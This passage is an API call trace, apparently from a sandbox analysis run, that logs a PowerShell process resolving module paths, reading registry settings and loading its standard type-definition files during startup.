	[0750.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0750.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0750.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0750.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0750.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0750.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0750.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ecbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0750.425] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0750.425] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0750.425] CoTaskMemFree (pv=0x41ef10) 
	[0750.427] CoTaskMemAlloc (cb=0xcc) returned 0x463610
	[0750.427] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x463610, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0750.427] CoTaskMemFree (pv=0x463610) 
	[0750.427] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed3c8 | out: phkResult=0x1ed3c8*=0x30c) returned 0x0
	[0750.427] RegQueryValueExW (in: hKey=0x30c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1ed34c, lpData=0x0, lpcbData=0x1ed348*=0x0 | out: lpType=0x1ed34c*=0x2, lpData=0x0, lpcbData=0x1ed348*=0x6c) returned 0x0
	[0750.428] CoTaskMemAlloc (cb=0x70) returned 0x402870
	[0750.428] RegQueryValueExW (in: hKey=0x30c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1ed31c, lpData=0x402870, lpcbData=0x1ed318*=0x6c | out: lpType=0x1ed31c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x1ed318*=0x6c) returned 0x0
	[0750.428] CoTaskMemFree (pv=0x402870) 
	[0750.428] CoTaskMemAlloc (cb=0xcc) returned 0x463610
	[0750.428] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x463610, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0750.428] CoTaskMemFree (pv=0x463610) 
	[0750.428] CoTaskMemAlloc (cb=0xcc) returned 0x463610
	[0750.428] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x463610, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0750.428] CoTaskMemFree (pv=0x463610) 
	[0750.432] RegCloseKey (hKey=0x30c) returned 0x0
	[0750.432] CoTaskMemAlloc (cb=0xcc) returned 0x463610
	[0750.432] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x463610, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0750.432] CoTaskMemFree (pv=0x463610) 
	[0750.432] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed3c8 | out: phkResult=0x1ed3c8*=0x30c) returned 0x0
	[0750.432] RegQueryValueExW (in: hKey=0x30c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x1ed34c, lpData=0x0, lpcbData=0x1ed348*=0x0 | out: lpType=0x1ed34c*=0x0, lpData=0x0, lpcbData=0x1ed348*=0x0) returned 0x2
	[0750.433] RegCloseKey (hKey=0x30c) returned 0x0
	[0751.800] CoTaskMemAlloc (cb=0x20c) returned 0x452d70
	[0751.801] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x452d70 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0751.802] CoTaskMemFree (pv=0x452d70) 
	[0751.802] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1ecf50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0751.803] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0751.815] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0751.815] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0751.816] CoTaskMemFree (pv=0x41ef10) 
	[0751.818] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0751.818] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0751.818] CoTaskMemFree (pv=0x41ef10) 
	[0751.823] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0751.823] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0751.823] CoTaskMemFree (pv=0x41ef10) 
	[0751.824] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0751.824] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0751.824] CoTaskMemFree (pv=0x41ef10) 
	[0751.825] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed1b8 | out: phkResult=0x1ed1b8*=0x314) returned 0x0
	[0751.827] RegQueryValueExW (in: hKey=0x314, lpValueName="path", lpReserved=0x0, lpType=0x1ed1cc, lpData=0x0, lpcbData=0x1ed1c8*=0x0 | out: lpType=0x1ed1cc*=0x1, lpData=0x0, lpcbData=0x1ed1c8*=0x74) returned 0x0
	[0751.827] RegQueryValueExW (in: hKey=0x314, lpValueName="path", lpReserved=0x0, lpType=0x1ed13c, lpData=0x0, lpcbData=0x1ed138*=0x0 | out: lpType=0x1ed13c*=0x1, lpData=0x0, lpcbData=0x1ed138*=0x74) returned 0x0
	[0751.827] CoTaskMemAlloc (cb=0x78) returned 0x402870
	[0751.827] RegQueryValueExW (in: hKey=0x314, lpValueName="path", lpReserved=0x0, lpType=0x1ed10c, lpData=0x402870, lpcbData=0x1ed108*=0x74 | out: lpType=0x1ed10c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1ed108*=0x74) returned 0x0
	[0751.827] CoTaskMemFree (pv=0x402870) 
	[0751.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1ece80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0751.827] SetErrorMode (uMode=0x1) returned 0x1
	[0751.827] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1ed090 | out: lpFileInformation=0x1ed090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0751.828] SetErrorMode (uMode=0x1) returned 0x1
	[0751.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ece80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0751.830] SetErrorMode (uMode=0x1) returned 0x1
	[0751.831] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed090 | out: lpFileInformation=0x1ed090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0751.831] SetErrorMode (uMode=0x1) returned 0x1
	[0751.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ece80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0751.835] SetErrorMode (uMode=0x1) returned 0x1
	[0751.835] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ed090 | out: lpFileInformation=0x1ed090*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0751.836] SetErrorMode (uMode=0x1) returned 0x1
	[0751.840] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0751.840] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0751.842] CoTaskMemFree (pv=0x41ef10) 
	[0753.318] CoTaskMemAlloc (cb=0x104) returned 0x41ef10
	[0753.319] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41ef10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0753.319] CoTaskMemFree (pv=0x41ef10) 
	[0753.320] GetACP () returned 0x4e4
	[0753.344] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1eca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0753.344] SetErrorMode (uMode=0x1) returned 0x1
	[0753.345] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318
	[0753.346] GetFileType (hFile=0x318) returned 0x1
	[0753.346] SetErrorMode (uMode=0x1) returned 0x1
	[0753.346] GetFileType (hFile=0x318) returned 0x1
	[0754.440] ReadFile (in: hFile=0x318, lpBuffer=0x2da65a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2da65a8*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0754.443] ReadFile (in: hFile=0x318, lpBuffer=0x2da65a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2da65a8*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0754.444] ReadFile (in: hFile=0x318, lpBuffer=0x2da65a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2da65a8*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0754.445] ReadFile (in: hFile=0x318, lpBuffer=0x2da65a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2da65a8*, lpNumberOfBytesRead=0x1ecfc8*=0xcf3, lpOverlapped=0x0) returned 1
	[0754.446] ReadFile (in: hFile=0x318, lpBuffer=0x2da5a03, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2da5a03*, lpNumberOfBytesRead=0x1ecfc8*=0x0, lpOverlapped=0x0) returned 1
	[0754.446] ReadFile (in: hFile=0x318, lpBuffer=0x2da65a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2da65a8*, lpNumberOfBytesRead=0x1ecfc8*=0x0, lpOverlapped=0x0) returned 1
	[0754.448] CloseHandle (hObject=0x318) returned 1
	[0754.452] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0754.453] SetErrorMode (uMode=0x1) returned 0x1
	[0754.453] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ecf40 | out: lpFileInformation=0x1ecf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0754.454] SetErrorMode (uMode=0x1) returned 0x1
	[0754.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0754.456] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed028 | out: phkResult=0x1ed028*=0x318) returned 0x0
	[0754.456] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecfac, lpData=0x0, lpcbData=0x1ecfa8*=0x0 | out: lpType=0x1ecfac*=0x1, lpData=0x0, lpcbData=0x1ecfa8*=0x56) returned 0x0
	[0754.456] CoTaskMemAlloc (cb=0x5a) returned 0x47ec90
	[0754.456] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ecf7c, lpData=0x47ec90, lpcbData=0x1ecf78*=0x56 | out: lpType=0x1ecf7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ecf78*=0x56) returned 0x0
	[0754.456] CoTaskMemFree (pv=0x47ec90) 
	[0754.456] RegCloseKey (hKey=0x318) returned 0x0
	[0754.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0754.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x1ecb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0757.332] GetSystemInfo (in: lpSystemInfo=0x1ebc60 | out: lpSystemInfo=0x1ebc60*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0757.334] VirtualQuery (in: lpAddress=0x1ebd10, lpBuffer=0x1ecbd0, dwLength=0x30 | out: lpBuffer=0x1ecbd0*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0757.357] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318
	[0757.357] GetFileType (hFile=0x318) returned 0x1
	[0757.357] SetErrorMode (uMode=0x1) returned 0x1
	[0757.358] GetFileType (hFile=0x318) returned 0x1
	[0757.358] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.657] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.658] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.659] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.659] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.661] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.661] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.662] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.662] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.664] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.664] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.665] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.665] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.666] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.666] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.666] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.667] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.673] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.674] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.674] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.674] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.675] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.675] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.675] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.676] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.676] ReadFile (in: hFile=0x318, lpBuffer=0x2e0d768, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ecfc8, lpOverlapped=0x0 | out: lpBuffer=0x2e0d768*, lpNumberOfBytesRead=0x1ecfc8*=0x1000, lpOverlapped=0x0) returned 1
